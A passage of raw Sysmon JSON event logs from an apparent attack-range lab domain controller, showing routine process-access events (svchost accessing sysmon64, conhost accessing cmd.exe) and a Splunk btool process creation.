C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3019,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3020,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.436\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001094420500}\r\nTargetProcessId: 4204\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.436","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001094420500}","TargetProcessId":"4204","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.453\r\nProcessGuid: {41C8662E-1FF0-5F25-0000-001050430500}\r\nProcessId: 4224\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF0-5F25-0000-001094420500}\r\nParentProcessId: 4204\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.453","ProcessGuid":"{41C8662E-1FF0-5F25-0000-001050430500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 